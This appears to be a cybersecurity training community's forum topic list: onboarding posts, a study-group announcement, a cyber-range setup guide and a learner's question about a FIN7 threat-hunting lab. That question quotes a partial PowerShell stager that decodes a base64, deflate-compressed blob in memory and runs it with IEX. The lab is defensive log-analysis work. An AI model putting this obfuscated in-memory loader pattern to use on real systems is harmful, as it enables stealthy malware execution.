getting started
45 Topics

How to Get Started in the Community
Welcome to the Human Connection community! Follow these simple steps to get started...
1. Read the Community How-to Guides
2. Read the Community Guidelines
3. Read the Community Best Practices
Once you feel ready, come and introduce yourself to the rest of the community.

Community Navigation Guide
This community was built to foster connections between you, our passionate customers, and us, the experts who are building the products that you love. To get started, read the Community Guidelines, introduce yourself to the rest of the community and take a look around.

FIN7 Threat Hunting with Splunk: Ep.3 – Execution Logs
I am pulling my hair out with this last question: "Rebuild the PowerShell script from the previous question using the three parts found in the PowerShell operational logs. What is the MD5 hash of this file? (The file should not contain any trailing white space or return characters)"

I ran

    index=* (EventCode=4104) | search "stager.ps1" AND "scriptblock" | table _raw

and added the script content of files (1 of 3), (2 of 3) and (3 of 3) to a new file. I removed the spaces and made sure they are glued together. I pasted the file into CyberChef with MD5 selected and I keep getting the wrong hash. See a sample of the beginning and end of the 3 files below; this is just a sample. I really don't know what else to do with this.

    $EncodedCompressedFile = @'
    7b1pk+LKcjD83RH3P5y4cT/Y0ddusfXAfcMRT5U2JJCgBBJIDn8AAQIklmmgBfz6N7O00sCcnuuxH9vPUcRMo1qycqvMrFItfxmsgu3keHqf//avv/2fP//pH/5NiiJts9+9H//xz+H8fTuPatV/mUXRn//p u3rgE9+I/KPY62u+qTQuvp0Xqu3KPkEovj/867/++Z/+9A9/+oe/jFZbY7757V9/w1+96fpvf3NW78fTJCJRtPP/UfjrvxmT4/Lf//Y3Y3L+x79ML8f54V+6821wXP5VOFcEQfgn+FuDv/CnLnCY/za4HI7zzb9Yp+1xtZn/i7Y9zt93+8H8/WPlQ3Vj8n5YTiKAKe72lxToX4W/prj89aaVHEuOm/g+nxznwyX8mQFuRR38ja3//w==
    '@
    $Decoded = [System.Convert]::FromBase64String($EncodedCompressedFile)
    $MemStream = New-Object System.IO.MemoryStream
    $MemStream.Write($Decoded, 0, $Decoded.Length)
    $MemStream.Seek(0,0) | Out-Null
    $CompressedStream = New-Object System.IO.Compression.DeflateStream($MemStream, [System.IO.Compression.CompressionMode]::Decompress)
    $StreamReader = New-Object System.IO.StreamReader($CompressedStream)
    $Output = $StreamReader.readtoend()
    $Output | IEX

💻🔐 Study Group Vote Revealed! Get Involved! 💻🔐
The Votes are In! This week you asked for a defensive lab for Study Group.

What are we studying? This week, we've selected Web Server Logs: Ep.6 — The Tomcat's Out Of The Bag, in which it'll be your job to investigate an incident by looking at web server log files.

How can I get involved?
- Dive into the lab: Get started on the lab and challenge yourself to complete it by the end of the week.
- Join the discussion: Don't forget to share your experiences, ask questions, and drop any tips or tricks you've picked up along the way in this forum discussion.
- Support each other: This is all about collaboration—whether you're struggling with a concept or want to share an "aha" moment, jump into the conversation!

We'll re-vote on Friday for next week's lab, so stay engaged and help shape where this study group goes. Let's learn together and level up our skills! Every community member who has access to an Immersive license is welcome to join this study group.

I'd also like to welcome our new members from last week: jaureguibooksit, cmc15, sargentv, pepplebryan, jp4821a, SCepparulo, RBlv, shahedanara, lking2547, Yuknow312, WinChan, rob_nolan, ohheykhanh, ChristopherRouse_80, zooooomer, Benjamin LP, megangrace, oP, 4n6cy, Joeatt75, Cicada3301, Leslie_Saravia_OHD, kpas1868, x0du, Garyb, aloharae, egly443, Sam Thomas0akes, Djparker, SElder, markbaluis07. It's great to have you here! If you're looking for a place to start in this community, partaking in Study Group is the place for you!

How to use Immersive cyber ranges for cyber threat research?
Want to know how to take advantage of the cyber ranges platform to do malware and adversary research in a sandboxed environment? In this post, I'll walk you through how to get access to the Heimdall Detection Engineering template for CTI so you can do just that!

The Heimdall template is a domain-joined range that contains workstations, a domain controller, and security tooling that you'd ordinarily find in a real network. The purpose of this template is to enable cyber threat research, where you can launch attacks and malware, capture indicators of compromise through tools like Velociraptor, a SIEM, a network packet capture tool, and some analyst workstations with a bunch of analysis and reverse engineering tools. With that said, let's get started.

Firstly, you'll need to go to the cyber ranges sign-up page and sign up with a name and email address. After hitting "Sign up", you'll need to go to your email and find the confirmation email to get your credentials, then go back to the cyber ranges website and log in with your new credentials. After signing in, you'll be in the main ranges dashboard. You'll need to connect your own Amazon Web Services (AWS) account to use ranges, as provisioning machines will cost money for every hour that they are active or stored. Once you've connected your AWS account, you can then go to "Range Templates" and launch the Heimdall range.

How do I join the community?
I want to contribute to the community; how can I register and participate?

Strangeness with SSO?
Hey, is anyone else having weird issues with authentication when trying to be logged into both the main Immersive Labs platform and this Community site in the same browser at the same time?

If I load the Community site first, it mostly seems to play nice. But if I've got IL open in another tab and come here, it seems to get stuck in weird authentication loops, where I log in, stick my creds in (for customer/EU), then get redirected back to the site to find it is still saying "Sign In" in the top right corner.

I also could just see a load of discussions about one of the FIN7 labs when I wasn't logged in - but now that I'm logged in, I can't find the thread at all. Perhaps I should stop using MS Edge? ;-p

Cheers, Steve.